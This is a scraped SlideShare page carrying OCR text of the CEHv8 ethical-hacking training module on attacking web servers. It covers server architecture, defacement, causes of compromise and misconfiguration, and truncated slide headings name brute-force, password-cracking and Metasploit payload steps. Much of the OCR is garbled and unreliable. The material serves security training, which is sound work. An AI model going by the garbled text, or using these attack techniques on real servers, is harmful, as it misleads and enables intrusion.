Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.
Hacking Webservers

Module 12
Ethi(al Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Hacking Webservers

Module 12...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Security News

     
 
 

P—F...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

AnonymousOwn3r‘s bio reads ”...
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

‘ i I
v- A

l ; t'i_t . «:i....
Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker
Hacking Webservers

; 'l_liw’. _l. ‘!_l.1_l‘s-‘ ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

(. .m. .I man A. ..

.  Webse...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Apache

Microsoft - IIS

lite...
Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

 

Hacking Webservers
I Igx: —:_u.  s? im_i;4e«...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Site Users :11:-.  -i-inn.  A...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

 

Internet Information

 

...
Ethical Hacking and Countermeasures
Hacking Webservers

Client -‘it: -ii

H1TP Protocol

 

 

Exam 312-50 Certified Ethic...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Wei-i~riJi_iit—l ‘l '3-l}= ._...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

'. '.-. .I'. 'i'-'  ‘

File c...
Ethical Hacking and Counternieasures Exam 312-50 Certified Ethical Hacker
Hacking Websewers

WhyWeb Servers Are Compromise...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

:3 End User's Concern:  Usual...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

 

; l.I_u3gr= ._l<*~ii1 o )i...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

6 Root access to other applic...
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

; w_lu -at u. _l-. .« 3 it v...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Web Server Misconfiguration £...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

. 
In . |.

'. '!= J_T-« ¢i=...
Ethical Hacking and Countermeasures Exam 31250 Certified Ethical Hacker
Hacking Webservers

Directory Traversal Attacks C ...
Ethital Hacking and (ountermeasures Exam 31250 Certified Ethical Hacker
Hacking Webservers

HTTP Response Splitting Attack...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

l | Il. 'l| .|O= iH>1'I| i
HT...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

 

 

Hacking Webservers
I L I .  _ I‘ I l
*3/: ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

     
    

 I’
" . ..h-‘‘. ....
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

 

 

 

Hacking Webservers
"iv Illlai-ni_ .  _ ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

   

       

  

.  ' i
l ‘I...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

SSH Bruteforce Attack C EH

r...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

 

? _'l_t. =r. _i_-Jl. ,i+-...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

‘ ’ rj User visits a website ...
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

"If-. i_T-in aw. ‘-. ' in; -...
Ethical Hacking and Countermeasures Exam 31250 Certified Ethical Hacker
Hacking Webservers

Webserver Password Cracking

C...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

6 Hybrid Attack:  A hybrid at...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

W: ~i_.3 ~ L :1 :  l_. l.: l'...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Command Injection Attacks

J ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

; w_iu -Ll.  u. _l-. .« :1» ...
,, ,«i_.   c~  @ @ fl, 

Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers
lil’...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Vulnerability scanning is a m...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

-
4

W= J_T-rd =4-_2.' us: -...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Source:  httg: [[www. whois. ...
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

W= J_T-rd =4-_2.' us: -_'-it...
Ethical Hacking and Countermeasures

Hacking Webservers

l'le'rcn. Ar= 'r

Exam 312-50 Certified Ethical Hacker

Search We...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

 

Hacking Webservers
if I r.  'l -9 ‘.  'I ‘.  ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

     

F httprecon 7.3 - http...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

0

ID Serve 5’ X

Internet Se...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

-
i

'3!-—lfoi; r-—ii; -.' V...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

 

H Site mirroring in progre...
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

l :4
u __l _I_

l '. 'I= J_T...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

that enhance usability,  effe...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

-
4

‘ '. 't-.1?-in = ¢_'o. ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

 

 
   

          

   

bu...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

". 'I: J_T-i; t:J-_'i‘ *I= J...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

0 Brutus - AET2 - www. hoobie...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

; w_iu -at ~. i._l-. .« 3 it...
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

. *.*! =J_T-in = -L’-. ' its...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

6 Assess the security of web ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers
.  ‘_. i , - i_~. ,7I.  l-7:‘...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Libraries

    
   

Rex

CU5...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

; 'l_i=1ir: _i:1_‘; i_i-xiii...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

   
 

I Metasploit Payload M...
Ethical Hacking and Countermeasures Exam 31250 Certified Ethical Hacker
Hacking Webservers

Command Prompt

msf > use wind...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

      
 

_J Metasp| oit’s au...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Webservers

I
1 .13. . -

1_'l_li;1il'2_...
Ethital Hatking and Countermeasures Exam 31250 Certified Ethical Ha(ker
Hacking Webservers

Command Prompt

msf > use X86/...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

Weijo in : -a_%. * +1:-i-.2‘ ...
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Webservers

8 wletch-Wletchi - ° "
Erie

...
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Cehv8 - Module 12: Hacking Webservers
Prochain SlideShare
Chargement dans…5
×

Cehv8 - Module 12: Hacking Webservers

2 606 vues

Publié le

Cehv8
Module 12: Hacking Webservers

Download here:
CCNAv5:
ccna5vn.wordpress.com
Cehv8:
cehv8vn.blogspot.com

Publié dans : Formation
  • Soyez le premier à commenter

Cehv8 - Module 12: Hacking Webservers

  1. 1. Hacking Webservers Module 12
  2. 2. Ethi(al Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Hacking Webservers Module 12 Engineered by Hackers. Presented by Professionals. Ethical Hacking and Countermeasures V8 Module 12: Hacking Webservers Exam 312-50 Module 12 Page 1601 Ethical Hacking and Countermeasures Copyright © by [G-GM All Rights Reserved. Reproduction is Strictly Prohibited.
  3. 3. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Security News P—F “ / GoDaddy Outage Takes Down Millions of Sites. Anonymous Member claims Responsibility Monday, September 10th, 2012 Final update: GoDaddy is up, and claims that the outage was due to internal errors and not a DDoS attack. According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the official GoDaddy Twitter account the company is aware of the issue and is worklngto resolve It. ': t.. L>-cw ' . http: //techaundrcom Copyright © by E-Clcil. All Rights Reserved, Reproduction is Strictly Prohibited. Security News News - GoDaddy Outage Takes Down Millions of Sites, Anonymous Member Claims Responsibility Source: httg: [[techcrunch. com Final update: GoDaddy is up, and claims that the outage was due to internal errors and not a DDoS attack. According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the Update: Customers are complaining that GoDaddy hosted e-mail accounts are down as well, along with GoDaddy phone service and all sites using GoDaddy’s DNS service. Update 2: A member of Anonymous known as AnonymousOwn3r is claiming responsibility, and makes it clear this is not an Anonymous collective action. A tipster tells us that the technical reason for the failure is being caused by the inaccessibility of GoDaddy’s DNS servers — specifically CNS1.SECURESERVER. NET, CNS2.SECURESERVER. NET, and CNS3.SECURESERVER. NET are failing to resolve. Module 12 Page 1602 Ethical Hacking and Countermeasures Copyright © by All Rights Reserved. Reproduction is Strictly Prohibited.
  4. 4. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers AnonymousOwn3r‘s bio reads ”Security leader of #Anonymous ("Official member"’). " The individual claims to be from Brazil, and hasn't issued a statement as to why GoDaddy was targeted. Last year GoDaddy was pressured into opposing SOPA as customers transferred domains off the service, and the company has been the center of a few other controversies. However, AnonymousOwn3r has tweeted "I'm not anti go daddy, you guys will understand because i did this attack. ” / O Copyright @2012 AOL Inc. &Uj By K/ int Finley techcrunch. com 2012 09 10 odadd -outa e-takes-down-millions-of-sites htt : Module 12 Page 1603 Ethical Hacking and Countermeasures Copyright © by [G-Galincil All Rights Reserved. Reproduction is Strictly Prohibited.
  5. 5. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker ‘ i I v- A l ; t'i_t . «:i. ~.i. ;i l IIS Webserver Architecture why Web Servers are Compromised? impact of Webserver Attacks Webserver Attacks Webserver Attack Methodology Webserver Attack Tools Metasploit Architecture Web Password Cracking Tools ‘. . *' ml I 1.? "=4: ‘ . |_-: _r_ Countermeasures How to Defend Against Web Server Attacks Patch Management Patch Management Tools Webserver Security Tools Webserver Pen Testing Tools Webserver Pen Testing ‘A , ) Module Objectives '. 'J'A'li': ifll -Ii. -A1‘! '1 . ,,.1”irutiI: ii: lii;1tram-‘int: I:(am-; -i-i-iii-i-Imiit-riimar-tmiuii Often, a breach in security causes more damage in terms of goodwill than in actual quantifiable loss. This makes web server security critical to the normal functioning of an organization. Most organizations consider their web presence to be an extension of themselves. This module attempts to highlight the various security concerns in the context of webservers. After finishing this module, you will able to understand a web server and its architecture, how the attacker hacks it, what the different types attacks that attacker can carry out on the web servers are, tools used in web server hacking, etc. Exploring web server security is a vast domain and to delve into the finer details of the discussion is beyond the scope of this module. This module makes you familiarize with: 8 IIS Web Server Architecture 6 Why Web Servers Are Compromised? impact of Webserver Attacks Webserver Attacks Webserver Attack Methodology Webserver Attack Tools Metasploit Architecture Web Password Cracking Tools Module 12 Page 1604 *2 Countermeasures 6* How to Defend Against Web Server Attacks e Patch Management (I- Patch Management Tools (1 Webserver Security Tools (I Webserver Pen Testing Tools «I Webserver Pen Testing Ethical Hacking and Countermeasures Copyright © by [C-Ctiliiicil All Rights Reserved. Reproduction is Strictly Prohibited.
  6. 6. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ; 'l_liw’. _l. ‘!_l.1_l‘s-‘ 3 . a_-, _.-. ‘Jr I‘» i""i Webserver concepts Attack Methodology Webserver Attack Tools _ 1 —-l 4 Webserver Pen Testing Webserver Security Tools Patch Management counter- measures l—'l"A'H'5‘i. ,.-Flv. :l| I:Il: liisiltanalnuiIIHHI-1-[II-nit-; nII~1-11iiqii‘luu . ~- Module 1-"low To understand hacking web servers, first you should know what a web server is, how it functions, and what are the other elements associated with it. All these are simply termed web server concepts. So first we will discuss about web server concepts. I Webserver Concepts *9-' Webserver Attacks Attack Methodology Webserver Attack Tools N it ( K oi Webserver Pen Testing ) Webserver Security Tools / Patch Management Counter-measures This section gives you brief overview of the web server and its architecture. It will also explain common reasons or mistakes made that encourage attackers to hack a web server and become successful in that. This section also describes the impact of attacks on the web server. Module 12 Page 1605 Ethical Hacking and Countermeasures Copyright © by [C-Culmcll All Rights Reserved. Reproduction is Strictly Prohibited.
  7. 7. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers (. .m. .I man A. .. . Webserver Market Shares C EH Apache Microsoft » IIS Nginx Litespeecl Google Server Tomcat Lighttpd 20 30 40 50 60 70 80% Percentages http: //w3techs. com Copyright © by [C-€2iI. All Rights Reserved. Reproduction is Strictly Prohibited. «Q Web Server Market Shares __ Source: httg: [[w3techs. com The following statistics shows the percentages of websites using various web servers. From the statistics, it is clear that , i. e., 64.6%. Below that Microsoft Module 12 Page 1606 Ethlcal Hacking and Countermeasures Copyright © by All Rights Reserved. Reproduction is Strictly Prohibited.
  8. 8. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Apache Microsoft - IIS litespeed Google Server Tomcat Lighttpd O 10 20 30 40 50 60 70 80% FIGURE 12.1: Web Sewer Market Shares Module 12 Page 1607 Ethical Hacking and Countermeasures Copyright © by EG~GUIIIIcil All Rights Reserved. Reproduction is Strictly Prohibited.
  9. 9. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers I Igx: —:_u. s? im_i;4e«: —« '. 'I¢—: ,:u: «r4_‘-' ~74;-. . — l 5;: :: -:4,l_ri] in «E4 E: r. :. 1:-. Site Users -'1l('—- ‘l-Iillll Attacks ,1 c t ‘ A —. ‘:3 -~. , 6 : . . _~, _, o _ t — ~ 4;. » ~—r. J> (‘$5 A —. r M 9 9 9 3 . ... ... ... ... ... ... .. . . Wmm + ____________________ __: Linux 5 file System .4 . . . . . . . . Apache .4 . . . . . . 5 Email * ~. V 9 4 . . . . . . . . PHP 4. . ... ... ... ... ... ; . . 9 Appllcanons Compiled Extension MVSQL _, V. -)u'ii‘: ii‘ll. -I51'li'5 '1 . _. -Fl y. :1IIiikliisiitanalnuiIifarll-hllI-iii-znlixt-11iiqii‘lUn-Iiiifiic-a-l , "' Open Source Web Server Architecture architecture. Module 12 Page 1608 The diagram bellow illustrates the basic components of open source web server Ethical Hacking and Countermeasures Copyright © by [C-Culmcll All Rights Reserved. Reproduction is Strictly Prohibited.
  10. 10. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Site Users :11:-. -i-inn. Attacks v’ ’ ‘ C3 Pi’ c: (C E ‘ fl A ¢ f ‘ f‘ -‘. V . ——_l w I, , 4,»; l — l( I3), 4 re Internet Linux 3 Filesystem . j.. ... ... Apache . j.. ... .f. . j.. ... ... . }.. ... ... ... ... ... .:: . Applications MVSQL Compiled Extension _, FIGURE 12.2: Open Source Web Server Architecture Where, 8 Linux — the server's operating system 6 Apache — the web server component 8 MySQL — a relational database '5 PHP - the application layer Module 12 Page 1609 Ethical Hacking and Countermeasures Copyright © by [C-Cullllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  11. 11. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Internet Information Client " " l 1: Services (IIS) for Windows _ - , Server is a flexible, secure, k . t 4. . . . . . . HTTP Protocol and easy-to-manage web _ L _ _ .5” Internet 5‘3Ck lHTTP-5Y5) server for hosting anything * < ‘ ‘ on the web Kernel Mode : : Usc, M°de . ... ... ... ... ... .. . ... ... ... .. . : Svchost. exe Application Pool I Windows Activation Service ‘Wm 4 ---- --> Web Server Core Native Modules AppDomain WWW Service BL‘F, ln request pfO(E55II'lF, , Anonymous Managed _ —i ‘ auihcntitallflfl. authentication, Modules . authorization. cache managed engine, iis External Apps ; reso| ution, handler (e, ,,, ,m, _. , mpp, ,,g, manvma. handle’ we static file, default ; ,,, m, execution, release state, do(umem_H1Tp Cache] Amhemicafion application Host. config update cache, update log, and end request processing HTTP errors, and H1'rP logging U. -1-1ii‘:2i‘iI. -I3xH'5‘i . ,. 'llr~: ll': fl: ln5‘i(3H>ll'AilI: f3!lI'l'lll'| il'Zl"«$11il! il"VI'lfllai(-(‘l Q"§ IIS Web Server Architecture l IIS, also known as Internet Information Service, is a web server application developed by Microsoft that can be used with Microsoft Windows. This is the second largest web after Apache HTTP server. IT occupies around 17.4% of the total market share. It supports HTTP, HTTPS, FTP, FTPS, SMTP, and NNTP. The diagram that follows illustrates the basic components of IIS web server architecture: Module 12 Page 1610 Ethical Hacking and Countermeasures Copyright © by [C-Clilllicll All Rights Reserved. Reproduction is Strictly Prohibited.
  12. 12. Ethical Hacking and Countermeasures Hacking Webservers Client -‘it: -ii H1TP Protocol Exam 312-50 Certified Ethical Hacker Stack (HTTP. SYSl A A Kemel Mode 3 : Use, M°de Svchostexe Application Pool Vlllndouu Activation sorvko l““‘5l 4. . . . . . . . ; web Sewer Core Native Modules Appnomain WWW Service Begin request processing, Anonymous Managed authevlfitailcm. authentication, Modules authorilatiomcache Managed engine, IIS Ex‘e". ‘a' Apps r°S0l| m'0|'. l'|3"dl°Y certificate mapping, m-win h-r: d|-rvr-- static file, default ; .,, ,,, , ""‘"‘l°"r "‘ ‘“' 5”“! document, HTTP cache, - - I. . upditocacha, update “Tn; Errors and HTTP Amhenuahon app lcauon log, and end request I - l Host-confia processing °“'"‘ FIGURE 12.3: IIS Web Sewer Architecture Module 12 Page 1611 Ethical Hacking and Countermeasures Copyright © by EC-Gallllcil All Rights Reserved. Reproduction is Strictly Prohibited,
  13. 13. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Wei-i~riJi_iit—l ‘l '3-l}= ._l"l= -U_l_l= -U_l 3 +Il_: { . _ 1 .13. . - Web defacement occurs when an intruder maliciously alters visual appearance of a web —— - page by inserting or substituting provocative and frequently offending data Defaced pages exposes visitors to some propaganda or I misleading information until — . . ' the unauthorized change is discovered and corrected I ’ Hi Master, Your website owned , — . > ‘. — '~‘ by US, Hacker! l‘“" W 1. | /‘ ‘ii 3- Next target — microsoft. com U. -run : ii‘ie. -I3i'H'5‘f . ,. "llv~: llllflfiln5ii(§1>ll'AilIififilfllfilli'| ii'ZI"«$11il! ll"VIilfllafl-(‘l ‘:7 Website Defacement _. Website defacement is a process of changing the content of a website or web page by hackers. Hackers break into the web servers and will alter the hosted website by creating something new. Web defacement occurs when an intruder maliciously alters the visual appearance of a web page by inserting or substituting provocative and frequently offensive data. Defaced pages expose visitors to propaganda or misleading information until the unauthorized change is discovered and corrected. Module 12 Page 1612 Ethical Hacking and Countermeasures Copyright © by [C-Cliliiicll All Rights Reserved. Reproduction is Strictly Prohibited.
  14. 14. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers '. '.-. .I'. 'i'-' ‘ File can View Help http: //juggyboy. com/ index. aspx W v )3 W A T - J HACKED! , H Hi Master, Your website owned by US, Hacker! ’ l Next target— microsoft. com FIGURE 12.4: Website Defacement Module 12 Page 1613 Ethical Hacking and Countermeasures Copyright © by [C-Clilllisll All Rights Reserved. Reproduction is Strictly Prohibited.
  15. 15. Ethical Hacking and Counternieasures Exam 312-50 Certified Ethical Hacker Hacking Websewers WhyWeb Servers Are Compromised C E H aim» mun un- Unnecessary default. backup, or sample files Installing the server with default settings Improper file and directory permissions Security conflicts with business ease-of- use case Default accounts with their default or no passwords Misconfigurations in web sewer, operating systems, and networks Lack of proper security policy, procedures, and Security flaws in the sewer software, 05 and maintenance apP'i(3li°"5 Bugs in sewer software, 05, and web applications Misconfigured SSL certificates and encryption settings Improper authentication with external systems Use of self-signed certificates and default certificates Administrative or debugging functions that are enabled or accessible Unnecessary services enabled, including content management and remote administration Copyright 9 by E-‘ii. All Rights Reserved. Reproduction is Strictly Prohibited. ‘T-T Why Web Servers Are Compromised 7:7 There are inherent security risks associated with web servers, the local area networks that host web sites and users who access these websites using browsers. 6 : From a webmaster‘s perspective, the biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to the threats the Internet poses. This may be in the form of viruses, Trojans, attackers, or the compromise of information itself. Software bugs present in large complex programs are often considered the source of imminent security lapses. However, web servers that are large complex devices and also come with these inherent risks. In addition, the open architecture of the web servers allows arbitrary scripts to run on the server side while replying to the remote requests. Any CGI script installed at the site may contain bugs that are potential security holes. 6 : From a network administrator's perspective, a poorly configured web server poses another potential hole in the local network's security. While the objective of a web is to provide controlled access to the network, too much of control can make a web almost impossible to use. In an intranet environment, the network administrator has to be careful about configuring the web server, so that the legitimate users are recognized and authenticated, and various groups of users assigned distinct access privileges. Module 12 Page 161-1 Ethical Hacking and Countermeasures Copyiiglit ‘Ci hy All Rights Reserved. Repiocliictioii is Strictly Pioliibitecl.
  16. 16. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers :3 End User's Concern: Usually, the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, make it possible for harmful applications, such as viruses, to invade the user's system. Besides, active content from a website browser can be a conduit for malicious software to bypass the firewall system and permeate the local area network. The table that follows shows the causes and consequences of web server compromises: Installing the server with default Unnecessary default, backup, or sample files settings Improper file and directory permissions Security conflicts with business ease-of-use case Default accounts with their default Misconfigurations in web server, operating passwords systems and networks Unpatched security flaws in the server Lack of proper security policy, procedures, software, 05, and applications and maintenance Misconfigured SSL certificates and Bugs in server software, OS, and web encryption settings applications Use of self-signed certificates and Improper authentication with external default certificates systems Unnecessary services enabled, including Administrative or debugging functions that content management and remote are enabled or accessible administration TABBLE 12.1: causes and consequences of web server compromises Module 12 Page 1615 Ethlcal Hacking and Countermeasures Copyright © by EC-Cflllllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  17. 17. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers ; l.I_u3gr= ._l<*~ii1 o )i_? . lilfajo id = —lL‘-' *1 :11 Q4} 3‘. |f'24l"'J_i. ' If _ -. .13. - ® ii ‘ compromise of Data tampering Website defacement user accounts ‘ 4‘. ‘if (5) Secondary attacks Root access to other from the Website Data theft applications or servers / U. -1-1li‘:2rlI. -I3t'li'5‘i . _. "llr~: llIifljlh! ~‘if§13ll'AifI: f3!lI'l'l‘l'| il'il'f«$11illil““I'lfllai(-(‘l Impact of Web Server Attacks r— — __ Attackers can cause various kinds of damage to an organization by attacking a web server. The damage includes: U Compromise of user accounts: Web server attacks are mostly concentrated on user account compromise. If the attacker is able to compromise a user account, then the attacker can gain a lot of useful information. Attacker can use the compromised user account to launch further attacks on the web server. ‘:3 Data tampering: Attacker can alter or delete the data. He or she can even replace the data with malware so that whoever connects to the web server also becomes compromised. 8 Website defacement: Hackers completely change the outlook of the website by replacing the original data. They change the website look by changing the visuals and displaying different pages with the messages of their own. 6 Secondary attacks from the website: Once the attacker compromises a web server, he or she can use the server to launch further attacks on various websites or client systems. '3 Data theft: Data is one of the main assets of the company. Attackers can get access to sensitive data of the company like source code of a particular program. Module 12 Page 1616 Ethical Hacking and Countermeasures Copyright © by [C-Cullllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  18. 18. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers 6 Root access to other applications or server: Root access is the highest privilege one gets to log in to a network, be it a dedicated server, semi-dedicated, or virtual private server. Attackers can perform any action once they get root access to the source. Module 12 Page 1617 Ethical Hacking and Countermeasures Copyright © by It: -council All Rights Reserved. Reproduction is Strictly Prohibited.
  19. 19. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker ; w_lu -at u. _l-. .« 3 it v. » V «: l_= : . .13. . - Webserver Concepts Attack Methodology Webserver Attack Tools H-n-I 4 Webserver Pen Testing Webserver Security Tools Patch Management counter- measures 1.-Im: -e-: _ , .-fl Y-r : iIIzlkli1sfi(anan4iI: (asin-i- [-iqit-; -It~t1u‘tqii‘l'4i- Module 1-"low Considering that you became familiar with the web server concepts, we move forward to the possible attacks on web server. Each and every action on online is performed with the help of web server. Hence, it is considered as the critical source of an organization. This is the same reason for which attackers are targeting web server. There are many attack technique used by the attacker to compromise web server. Now we will discuss about those attack techniques. attack, HTTP response splitting attack, web cache poisoning attack, http response hijacking, web application attacks, etc. I Webserver Concepts Webserver Attacks ‘Va Attack Methodology Webserver Attack Tools ' .1 ' ( o’ Webserver Pen Testing { fl Webserver Security Tools / K Patch Management Counter-measures Module 12 Page 1618 Ethical Hacking and Countermeasures Copyright © by [C-Culllicll All Rights Reserved. Reproduction is Strictly Prohibited.
  20. 20. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Web Server Misconfiguration £ ---~ Verbose debug/ error Remote Administration l messages _ _ ' Functions Anonymous or Default _ _ Unnecessary Services Users/ Passwords ‘ " Enabled Sample Configuration, ___‘ _ _ Misconfigured/ Default and Script Files , _ Ssl Certificates ChpwflflnOhyH54IIIfl. N|Rflhsfleannd. RqMo¢xflonBSflkflyHwhbfled - ‘ Web Server Misconfiguration Web servers have various vulnerabilities related to configuration, applications, files, scripts, or web pages. Once these vulnerabilities are found by the attacker, like remote accessing the application, then these become the doorways for the attacker to enter into the network of a company. These loopholes of the server can help attackers to bypass user authentication. Server misconfiguration refers to configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers such as directory traversal, server intrusion, and data theft. Once detected, these problems can be easily exploited and result in the total compromise of a website. Remote administration functions can be a source for breaking down the server for the attacker. Some unnecessary services enabled are also vulnerable to hacking. O Misconfigured/ default SSL certificates. Verbose debug/ error messages. “ Anonymous or default users/ passwords. Sample configuration and script files. 